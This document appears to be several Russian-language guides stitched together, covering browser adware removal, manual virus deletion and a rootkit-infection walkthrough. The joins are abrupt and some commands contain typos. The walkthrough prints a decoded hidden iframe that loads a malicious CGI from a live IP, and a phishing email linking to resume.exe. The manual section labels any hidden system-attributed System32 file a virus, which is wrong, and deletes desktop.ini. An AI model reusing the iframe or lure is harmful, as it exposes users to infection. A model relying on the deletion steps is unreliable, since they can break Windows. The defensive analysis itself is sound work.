Привет друзья Если вы заметили у себя рекламную заразу, которая может сидеть в Гугл Хроме, Опере, Мозилле, то сегодня разберемся с тем как это удалить и вернуть все обратно. Скажу сразу, что таких рекламных вирусов сегодня много, кто-то больше по поведению похож на вирус, кто-то меньше, но у всех одна задача — реклама.

К примеру Searchtds, Firstsputnik, Smartsputnik, и другие — все это вирусные программы, если вы у себя на компьютере что-то такое заметили, то вполне возможно что у вас поселился рекламный вирус. Тут есть две новости, хорошая и плохая. Хорошая заключается в том, что это рекламный вирус, именно рекламный и он не так опасен, как обычные вирусы, то есть трояны, черви. Вот например вирус намного опаснее, чем рекламные вирусы, так как он просто шифрует файлы и часто их уже не вернуть

Руководство по большому счету для начинающих пользователей, но мое мнение, что о простейших механизмах работы рекламного вируса должен знать каждый. В этом руководстве вы узнаете:

• как удалить рекламные вирусы из браузеров полностью;
• как вручную определить заражение рекламным вирусом;
• какие лучше всего использовать утилиты для удаления именно рекламных вирусов;

Как вы уже поняли, рекламные вирусы что-то рекламируют. В последнее время они ну очень активными стали, знаете почему? Вот смотрите сами — компьютер это отдых, и люди за ним особо и не задумываются, а наоборот отдыхают. Недолго думая дураки (или просто хакеры) этим воспользовались и наштамповали кучу вирусов, которые внедряют рекламу.. А знаете что самое интересное? Что наглость дошла до того, что пихают рекламу уже прямо на рабочий стол. То есть даже если браузер не запущен, у вас все равно может быть реклама. Если нет ее сегодня, то вполне возможно что завтра один рекламный вирус загрузит другого и она появится

Но перед этим, откройте Панель управления (например через Пуск) и там найдите значок Программы и компоненты, потом посмотрите, нет ли подозрительных программ в списке установленных. Это например могут быть такие:

• Application Extension — программа по изменению набора расширений в браузере, то есть если нашли то удаляйте смело;
• GamesDesktop — это просто рекламная зараза, тоже удаляйте;
• Software Updater или все что содержит слово Updater — бесполезные программы, которые проверяют наличие новой версии, часто просто так сидят в процессах и потребляют оперативку; в связи с их бесполезностью спокойно могут загрузить и другие программы, в том числе и рекламное ПО;
• встраиваемая панель в браузеры ;

Как понять, что у меня рекламный вирус?

В основном это небольшие или значительные изменения в работе браузера, вы можете просто замечать странную дополнительную рекламу, например даже на стартовой странице поисковика (которой там никогда не было). А может доходить до того, что все ссылки на сайтах будут меняться на другие, и по сути вы вообще будете пользоваться другим интернетом

Симптомы заражения:

• при открытии браузера одновременно могут с ним открываться и левые сайты, при этом также может быть изменена домашняя страница; чтобы это все менять на автомате или чтобы запретить это менять вам, вирус устанавливает специально расширение;
• на разных сайтах появляется немного странная реклама, которой раньше не было; при этом браузер может больше грузить процессор;
• некоторые настройки изменять нельзя (редко) или же эффект от изменения нулевой, так как они все равно вернуться на те, которые установил вирус (часто);
• при этом ваш антивирус, какой бы он не был, ни о каких угрозах не сообщает; некоторые антивирусы спустя время начинают обнаруживать подобную угрозу;
• пароли к почте, аккаунтам в социальных сетях и другое, все это нетронуто и не взломано, что заставляет пользователя думать что все таки это не вирус и в итоге никакие меры по удалению не принимаются; многие вирусы способны установить код в систему, который время от времени будет загружать новые рекламные программы; в теории помочь от этого может только переустановке системы;
• появление левых папок в C:\Program Files; появление левых процессов, некоторые могут вести странную активность — то загружать процессор, то нет; также при простое компьютера, часто вирус начинает свою работу, это заметно по загрузке ЦП;

Как грамотно удалить?

Чтобы удалить эту нечисть, а также чтобы и другие вредоносные программы уничтожить, нужно подходить к делу комплексно. А именно — сперва провести обряд ручных проверок и по возможности удаления вирусных компонентов, а потом уже воспользоваться утилитами. Но, тем не менее, если у вас нет желания или нет времени тратить на возню с браузерами — можете смело перейти к пункту удаления нечисти при помощи специальных утилит (в конце статьи).

Проверка браузера Хром

Начну пожалуй с Google Chrome, как самого популярного браузера. Что мы будем делать? Сперва проверьте тот ярлык, с помощью которого вы запускаете браузер. Он должен иметь только такой вид, особенно обратите внимание на то место, где указано стрелочкой:

Видите, в конце поля Объект указан исполняемый файл программы, то есть chrome.exe, что там может быть еще? После закрывающейся кавычки может быть рекламный сайт, обычно начинается на http://, в любом случае все что после закрывающей кавычки — нужно удалить, если есть.

Более опасный вариант, когда вместо chrome.exe вообще стоит другой файл, например chrome.bat, что тут можно сделать? В общем лучше ничего не делать, если не уверены. Если опытный пользователь — вам нужно найти где находится сам chrome.exe и скопировать его, а потом на рабочий стол не вставить, а выбрать вставить ярлык. Таким образом вы создадите оригинальный ярлык Хрома. В папке, где был найден оригинальный chrome.exe, удалите все вирусные файлы, они могут иметь такие имена как chrome.bat, chrome.cmd, chrome.exe.exe или что-то похожее.

Второй шаг — проверка расширений. В браузере Хром в меню выберите Дополнительные инструменты, а дальше — Расширения:

Теперь посмотрите какие у вас стоят расширения и все подозрительные — сперва отключите, а потом удалите. Если вы удалите полностью все расширения — трагедии не будет, потом можно будет если что по новой установить нужные. Вот например тут одно расширение уже подозрительное — это KMPlayer for Chrome, его можно удалить:

Теперь проверьте, не изменил ли вирус домашнюю страницу в браузере, для этого в разделе Настройки посмотрите не указано ли открытие вирусного сайта при запуске браузера. Лучше или самому задать страницы (например тот же поисковик) или выбрать опцию восстановления тех вкладок, которые были открыты перед закрытием браузера:

На той же вкладке внизу обратите внимание на настройки поиска — там может стоять другая поисковая система:

Если там стоит левый поисковик, то нажмите на Настроить поисковые системы, выберите тот поисковик который вам подходит и потом удалите левый (нажмите крестик):

Не забудьте нажать кнопку Готово. На этом предварительные ручные методы по удалению рекламного вируса из Хрома закончены

Проверка браузера Опера

В браузере Opera все почти также, вот только тут изначально стоит немного другой файл, не opera.exe, а launcher.exe, что это такое? Это специальный модуль запуска Оперы, просто у некоторых стоит обычная Опера, а у других — переносная. Но не в этом суть. Проверьте внимательно, у вас тоже должно быть именно такое значение как в поле Объект на картинке ниже. Если там стоит opera.exe, opera.bat, opera.cmd или что-то похожее — то дело неладное. Найдите расположение файла launcher.exe от Оперы и создайте с него ярлык на рабочем столе. А тот файл, который указан в поле Объект, то есть подставной — удалите.

Я думаю что вы понимаете, все что идет после закрывающей кавычки — должно быть удалено, это все не имеет отношение к запуску браузера. Если будет например в конце через пробел идти http://google.com (даже если нет http://), то это означает что как бы вы не меняли настройки браузера, при старте всегда будет открываться страница Google.

Свойства оригинального ярлыка:

Вот в моем случае расширений вообще нет:

К чему я это? К тому, к чему и с Хромом — если даже вы удалите все расширения, то ничего страшного не будет. Установить какое-то расширение это пару секунд, просто напишите в поисковой строке название расширение и ваш браузер, потом переходите в официальный магазин дополнений и устанавливаете.

Откройте главное меню браузера, выберете пункт Настройки. Проверьте, нет ли странных сайтов, которые стоят в пункте При запуске — там может быть выбрано значение Открыть определенную страницу, и указан вирусный сайт. Если такой сайт есть — удалите его поставив вместо него какой-то полезный сайт или просто выберете опцию Продолжить с того же места:

По поводу поиска — убедитесь что стоит нормальный поисковик, тот которым вы пользуетесь. Если стоит вирусный, то сменить его тут:

Не знаю почему, но я не нашел опцию удаления поисковой системы из Оперы, можно только указать другую:

Для сохранения изменений нажмите Готово

Проверка браузера Мозилла

С Mozilla Firefox почти все также, зайдите в свойства ярлыка и посмотрите на поле Объект, обратите внимание на папку откуда запускается браузер. Все это должно быть оригинальным, как вот в этом ярлыке (только у вас папка может быть просто Program Files без x86):

Рабочая папка у вас должна быть такой же как и тут, все что отличается от firefox.exe в поле Обьект — нужно удалить. То есть находите где располагается файл, потом там удаляете псевдо-запускальщики браузера, это может быть firefox.cmd, firefox.bat, firefox.exe.exe и подобное. А из оригинального файла firefox.exe делаете ярлык и ставите в удобное место, например Рабочий стол.

Потом перейдите в раздел расширений:

Можете удалить все расширения, а потом при возможности установить только необходимые. Вот у меня вообще нет ни одного расширения:

Теперь в меню браузера выберите Настройки и перейдите на вкладку Основные, посмотрите не указано ли, чтобы при запуске открывался какой-то сайт. Если есть вирусный сайт — удалите, вместо него поставьте какой-то полезный сайт или вовсе выберите опцию Показывать окна и вкладки, открытые в прошлый раз:

На вкладке Поиск проверьте какая стоит поисковая система, при необходимости поменяйте ее. Внизу, я также советую удалить все поисковики, которые вам не нужны и оставить один или два:

Проверка Яндекс Браузера

С Яндекс Браузером такая же ситуация, хотя, в последнее время были произведены улучшения безопасности (технология ), поэтому на практике он немного реже заражается рекламными вирусами. Тем не менее, также как и в предыдущих вариантах, смотрим ярлык его, вот оригинальный и чистый:

Но тут тоже, как видите файл браузера это не yandex.exe или что-то похожее, а browser.exe, поэтому если там что-то другое — то замените на browser.exe, а потом проверьте рабочую папку браузера и удалите все подставные запускальщики (можно нажать расположение файла в свойствах).

Потом зайдите в дополнения:

И проанализируйте установленные расширения, по умолчанию в Яндекс Браузере уже идут некоторые дополнения, их можно отключить если они вам не нужны:

Если какое-то дополнение вам нужно, то его скачать в интернете очень просто, в том же Яндексе наберите имя расширения и название вашего браузера, как сразу в результатах на первых позициях будут официальные источники, где можно безопасно скачать расширение.

В Яндекс Браузере, в главном меню выберите Настройки и посмотрите что стоит в поисковых системах:

Если есть вирусный поисковик, то нажмите Настроить поисковые системы и удалите левый поиск, но чтобы это сделать он не должен быть выбран по умолчанию:

Проверка Internet Explorer (IE)

Пожалуй Internet Explorer единственный браузер, настройки которого изменять не так уж сложно, но при этом делают это немногие вирусы. Это связанно с тем, что он мало популярен, установлен то он у всех, но пользуются им мало

Тем не менее, тут тоже могут быть свои приколы. Перейдите в свойства ярлыка, если он в меню Пуск, то все равно проверьте:

Теперь внимательно посмотрите на данное окно свойств:

Также примерно должно быть и у вас. Примерно, потому что папка может быть не Program Files, а Program Files (x86), это в случае если у вас 32-битная система или вы пользуетесь 32-битным Internet Explorer. Рабочая папка также должна быть в таком виде.

Никаких iexplore.bat, iexplore.cmd и прочее, это все указывает на вирусные изменения в Windows.

Теперь откройте Панель управления, там найдите значок Свойства браузера и на вкладке Общие проверитьте не установлен ли какой-то сайт в поле домашняя страница:

Чтобы при открытии Internet Explorer было пустое окно, установите это значение:

Обычно меняют только домашнюю страницу, реже но тем не менее устанавливаются и тулбары (встраиваемая панель). Это нельзя отнести к вирусным обьектам, правда распространяются они именно вирусным способом. Я уже писал об одном таком, это , который не только в IE, но и во все остальные браузеры встраивается

Расширения Internet Explorer еще менее популярные чем сам браузер, но все же их тоже стоит проверить. Они именуются как Надстройки, чтобы удалить их или отключить, перейдите на вкладку Программы, там будет кнопка Управление надстройками:

Если там есть подозрительные элементы, то отключите и удалите их:

Удаление вредоносных обьектов при помощи специальных утилит

Это вариант, который возможно для вас будет лучшим, чем вручную проверить браузеры. Но, я думаю что ознакомиться вам с этим процессом будет полезно.

Специальные утилиты проверяют ваш комп на вирусные элементы, модификации, проверяют загрузочную область (MBR) и изменения в ней, расширения браузеров, службы. В общем проверяют все, но должен подчеркнуть, что это я имею ввиду использование целого комплекса утилит по очереди. Просто на своем опыте убедился — есть две хорошие утилиты, одна нашла то, что не нашла другая. При этом они реально лучшие на сегодняшний день.

Список утилит, которым я настоятельно советую проверить комп:

• — зарекомендовала себя как отличный инструмент проверки служб, расширений и всех областей, где могут быть вирусы; бесплатная, для проверки нужно соединение с интернетом, так как сперва будут загружены сигнатурные базы; требует перезагрузки, после которой будет предоставлен отчет;
• — тоже супер утилита. Вот первый инструмент и этот — это и есть, как мне кажется, лучшие утилиты по борьбе с рекламными вирусами; HitmanPro также проверят и кукисы, это такие данные, которые оставляют сайты у вас на компьютере; для удаления вирусов нужна регистрация, но можно вбить и несуществующий адрес почты; эффективность обнаружения и удаления отличная, проверена на личном опыте;
• — тоже неплохая утилита, и я ее тоже отношу к лучшим, умеет проверять расширения браузеров; нашла у меня вредоносное расширение в Хроме; рекомендую ней тоже проверить;
• — нацелена также на рекламные вирусы; ежедневное обновление сигнатурных баз; интеллектуальный эвристический анализ файлов на наличие подозрительных изменений; умеет находить даже скрытые угрозы, которые даже не влияют на производительность системы; присутствует технология Malwarebytes Chameleon, чтобы противостоять поведению, когда вирус пытается блокировать работу Malwarebytes Anti-Malware;
• в последнем пункте хотелось бы посоветовать вам еще две утилиты, но они уже специализируются на обычных вирусах, то есть на троянах, червях, руткитах и подобных; это и , обе уже содержат в себе антивирусные базы, находят все опасные вирусы, троянские программы, программы-склейщики файлов (это в основном используется для хакерских целей), потенциальное ПО, которое может в себе содержать вирусы, например трейнеры к играм, активаторы программ (взломщики);

Если вы ознакомитесь с этими всеми программами, то уверен, что вирусы если и будут у вас на компе, то избавиться теперь от них вам будет несложно. Комплексная проверка при подозрениях на вирусы поможет максимально очистить компьютер от вредоносных объектов.

В общем надеюсь что я свою миссию выполнил и хорошо познакомил вас с планом действия, когда у вас есть подозрение, что на компе поселился вирус а то и не один. Удачи

без использования каких-либо программ — антивирусов

Здесь мы покажем вам, как можно самостоятельно обнаружить и затем удалить файлы, способные нанести вред вашему компьютеру, или вирусы самостоятельно (вручную) без использования каких-либо антивирусных программ.

Это несложно . Давайте начнём!

Как удалить вирус самостоятельно

Действовать необходимо на правах администратора.

Для начала надо открыть командную строку. Для этого нажмите сочетание клавиш WINDOWS + R и в появившемся окне в строке введите cmd и нажмите ОК .

Команда cmd в командной строке

Либо, нажав кнопку Пуск в нижнем левом углу экрана монитора, в строке поиска начните набирать «командная строка », а затем по найденному результату кликните правой кнопкой мышки и выберите «Запуск от имени администратора ».

Вызов командной строки через поиск

Запуск командной строки от имени администратора

Кратко о том, какие цели у наших будущих действий:

С помощью команды attrib нужно найти такие файлы, которые не должны находиться среди системных файлов и потому могут быть подозрительными.

Вообще, в C: / drive не должно содержаться никаких .exe или .inf файлов. И в папке C:\Windows\System32 также не должны содержаться какие-либо, кроме системных, скрытые или только для чтения файлы с атрибутами i, e S H R .

Итак, начнём ручной поиск подозрительных, файлов, то есть вероятных вирусов, самостоятельно, без использования специальных программ.

Откройте командную строку и вставьте cmd . Запустите этот файл от имени администратора.

Открываем cmd

Прописываем в строке cd/ для доступа к диску. Затем вводим команду attrib . После каждой команды не забываем нажимать ENTER:

Команда attrib в командной строке

Как видим из последнего рисунка, файлов с расширениями .exe или .inf не обнаружено.

А вот пример с обнаруженными подозрительными файлами:

Вирусы в системе Windows

Диск С не содержит никаких файлов .еxе и. inf , пока вы не загрузите эти файлы вручную сами . Если вы найдёте какой-либо файл, подобный тем, которые мы нашли, и он отобразит S H R , тогда это может быть вирус .

Здесь обнаружились 2 таких файла:

autorun. inf

sscv.exe

Эти файлы имеют расширения .еxе и. inf и имеют атрибуты S H R . Значит, эти файлы могут быть вирусами .

Теперь наберите attrib -s -h -г -а -i filename. extension . Или в нашем примере это:

attrib — s — h — г — а -i autorun. inf

Эта команда изменит их свойства, сделав из них обычные файлы. Дальше их можно будет удалить.

Для удаления этих файлов введите del filename. extension или в нашем случае:

del autorun.inf

То же самое надо проделать со вторым файлом:

Удаление вирусов вручную

Теперь перейдём к папке System32.

Впишите cd win* и нажмите ENTER.

Снова введите s ystem32. Нажмите ENTER.

Затем впишите команду attrib . Нажмите ENTER.

Появился вот такой длинный список:

Снова вводим внизу команду attrib , не забывая нажать потом ENTER :

И находим вот такие файлы:

Подозрительные файлы в папке Windows

При перемещении вверх-вниз экран перемещается очень быстро, поэтому когда мелькнёт что-то новое, приостановитесь и вернитесь назад‚ чтобы проверить каждый файл, не пропустив ни одного.

Подозрительные файлы в папке Windows

Выписываем себе все найденные S H R файлы :

1. atr. inf
2. dcr. exe
3. desktop. ini
4. idsev.exe

Выполните команду attrib 3 или 4 раза, чтобы убедиться, что вы проверили всё.

Ну, вот. Мы самостоятельно нашли целых 4 вредоносных файла! Теперь нам нужно удалить эти 4 вируса.

C:\Windows\System32>attrib -s -h -r -a -i atr.inf

C:\Windows\System32>del atr.inf

C:\Windows\System32>attrib -s -h -r -a -i dcr.exe

C:\Windows\System32>del dcr.exe

C:\Windows\System32>attrih -s -h -r -a -i desktop.ini

C:\Windows\\System32>del desktop.ini

C:\Windows\System32>attrib -s -h -r -a -i idsev.exe

C:\Windows\System32>del idsev.exe

Удаляем вирусы с компьютера самостоятельно

Аналогичную операцию надо провести с другими папками, вложенными в каталог Windows.

Нужно просканировать ещё несколько таких каталогов, как Appdata и Temp . Используйте команду attrib , как показано в этой статье, и удалите все файлы с атрибутами S H R, которые не имеют отношения к системным файлам и могут заразить ваш компьютер.

    Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или... много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус - это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) - гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами - не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.

Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден - должна быть запущена какая-то программа. Идеально - с административными правами, желательно - без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. - большинство грамотных пользователей данную опцию отключили навсегда.

Для отключения функций автозапуска в Windows XP/2000 reg-файл для импорта в реестр.

Для Windows 7 и более поздних отключение автозапуска можно выполнить с использованием апплета "Автозапуск" панели управления. В этом случае отключение действует по отношению к текущему пользователю. Более надежным способом защиты от внедрения вирусов, переносимых на съемных устройствах, является блокировка автозапуска для всех пользователей с помощью групповых политик:

    Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR"ом, а изменения в реестре отменены PT Startup Monitor"ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:

iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

Означающий выполнение CGI-сценария сервера с IP - адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат - вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега "iframe" сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.

    В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами - так называемые руткит (rootkit) - технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.

    Удаление "качественного" вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами - вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, - все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.

    Развитие антивирусов тоже не стоит на месте, - они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет "не по зубам" любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса - это работа, которую рано или поздно придется выполнять любому пользователю компьютера.

Здравствуйте.
Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
наш фирменный бланк резюме и отправить его по адресу [email protected]
Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
позвоним Вам в течение нескольких дней. Не забудьте
указать телефон, а также позицию, на которую Вы претендуете. Желательно
также указать пожелания по окладу.
Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
http://verano-konwektor.pl/resume.exe

    Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.

    Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего, получите троянскую программу на свой компьютер.
    Скачиваю файл resume.exe. Размер - 159744 байта. Пока не запускаю.
    Копирую файл на другие компьютеры, где установлены различные антивирусы - просто для очередной проверки их эффективности. Результаты не ахти - антивирус Avast 4.8 Home Edition деликатно промолчал. Подсунул его Symantec"у - та же реакция. Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле, не зря набирает популярность.
    Все эксперименты выполняю на виртуальной машине с операционной системой Windows XP. Учетная запись с правами администратора, поскольку, чаще всего вирусы успешно внедряются в систему только, если пользователь является локальным администратором.
    Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал свое черное дело.
    Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка. На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP. Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) - надо же оставить вирусу хоть какую-то возможность проявить свою активность. Как правило, после внедрения, вирус должен связаться с хозяином или с заданным сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете сказанного выше, умный вирус может их замаскировать, кроме того, он может и обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого не произошло, но для надежного анализа сетевой активности весь трафик зараженной машины лучше пустить через другую, незараженную, где можно быть уверенным, что правила брандмауэра выполняются, а анализатор трафика (я пользовался Wireshark"ом) выдает то, что есть на самом деле.
    Перезагружаюсь. Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет, поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в службах, ни в системных каталогах не появилось ничего нового. Просмотр системного журнала дает только одну наводку - системе не удалось запустить таинственную службу grande48 . Такой службы у меня быть не могло, да и по времени это событие совпало с моментом внедрения. Что еще наводит на мысль об успешном внедрении - так это отсутствие в реестре записи о службе grande48 и отсутствие второго сообщения в журнале системы об ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая недоработка вирусописателей. Хотя и несущественная, ведь большинство пользователей журнал событий не просматривают, да и на момент возникновения подозрения на заражение эта запись в журнале уже может и отсутствовать.

Определяем наличие вируса в системе.

1.     Наверняка должен быть "левый" трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось - один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.

2.     Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Одна из наиболее популярных - Марка Руссиновича, которую можно скачать на странице раздела Windows Sysinternals сайта Microsoft. Инсталляция не требуется. Разархивируем и запускаем. Жмем "Scan". После непродолжительного сканирования видим результаты:

    Кстати, даже не вникая в содержания строк, можно сразу заметить, что имеются очень "свежие" по времени создания/модификации записи или файлы (колонка "Timestamp") . Нас в первую очередь должны заинтересовать файлы с описанием (колонка "Description" ) - "Hidden from Windows API" - скрыто от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений - это, естественно, ненормально. Два файла - grande48.sys и Yoy46.sys - это как раз то, что мы ищем. Это и есть прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала - это нормальные драйверы Windows XP. Кроме того, вирус скрывал их наличие только в папке \system32 , а их копии в \system32\dllcache остались видимыми.
    Напомню, что в Windows XP применяется специальный механизм защиты системных файлов, называемый Windows File Protection (WFP) . Задача WFP - автоматическое восстановление важных системных файлов при их удалении или замене устаревшими или неподписанными копиями. Все системные файлы Windows XP имеют цифровую подпись и перечислены в специальной базе данных, используемой WFP. Для хранения копий файлов используется папка \system32\dllcache и, отчасти, \Windows\driver cache . При удалении или замене одного из системных файлов, WFP автоматически копирует "правильную" его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache , то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP. Попробуйте удалить vga.sys из \system32, и система тут же его восстановит, используя копию из dllcache. А ситуация, когда, при работающей системе восстановления файлов, файл драйвера есть в \dllcache и его не видно в \system32 - это тоже дополнительный признак наличия руткита в системе.

Удаляем вирус из системы.

    Осталось выполнить самое важное действие - удалить вирус. Самый простой и надежный способ - загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.

Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню - жмем R.

Выбираем систему (если их несколько):

Вводим пароль администратора.
Список драйверов и служб можно просмотреть с помощью команды listsvc:

В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:

Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:

    Водим команду EXIT и система уходит на перезагрузку.
После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его файлы и очистить реестр от его записей. Можно проделать это вручную, а можно использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения, будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря Данилова. Скачать можно отсюда - http://freedrweb.ru
    Там же можно скачать "Dr.Web LiveCD" - образ диска, который позволяет восстановить работоспособность системы, пораженной действиями вирусов, на рабочих станциях и серверах под управлением Windows\Unix, скопировать важную информацию на сменные носители либо другой компьютер, если действия вредоносных программ сделали невозможным загрузку компьютера. Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и подозрительных файлов, но и попытается вылечить зараженные объекты. Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением.iso) и записать его на CD. Будет создан загрузочный диск, загрузившись с которого, руководствуетесь простым и понятным меню.

    Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD, можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить, загрузившись в другой ОС, например, с использованием Winternals ERD Commander. Для сканирования зараженной системы необходимо указать именно ее жесткий диск (Режим "Выборочная проверка"). Сканер поможет вам найти файлы вируса, и вам останется лишь удалить связанные с ним записи из реестра.
    Поскольку вирусы научились прописываться на запуск в безопасном режиме загрузки, не мешает проверить ветку реестра:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot
Разделы:
Minimal - список драйверов и служб запускаемых в безопасном режиме (Safe Mode)
Network - то же, но с поддержкой сети.

Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и, естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.

    Если у вас возникли сомнения относительно какого-либо файла, то можно воспользоваться бесплатной онлайновой антивирусной службой virustotal.com . Через специальную форму на главной странице сайта закачиваете подозрительный файл и ждете результатов. Сервисом virustotal используются консольные версии множества антивирусов для проверки вашего подозреваемого файла. Результаты выводятся на экран. Если файл является вредоносным, то с большой долей вероятности, вы сможете это определить. В какой-то степени сервис можно использовать для выбора "лучшего антивируса".
ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн - проверок компьютера, браузера, файлов...

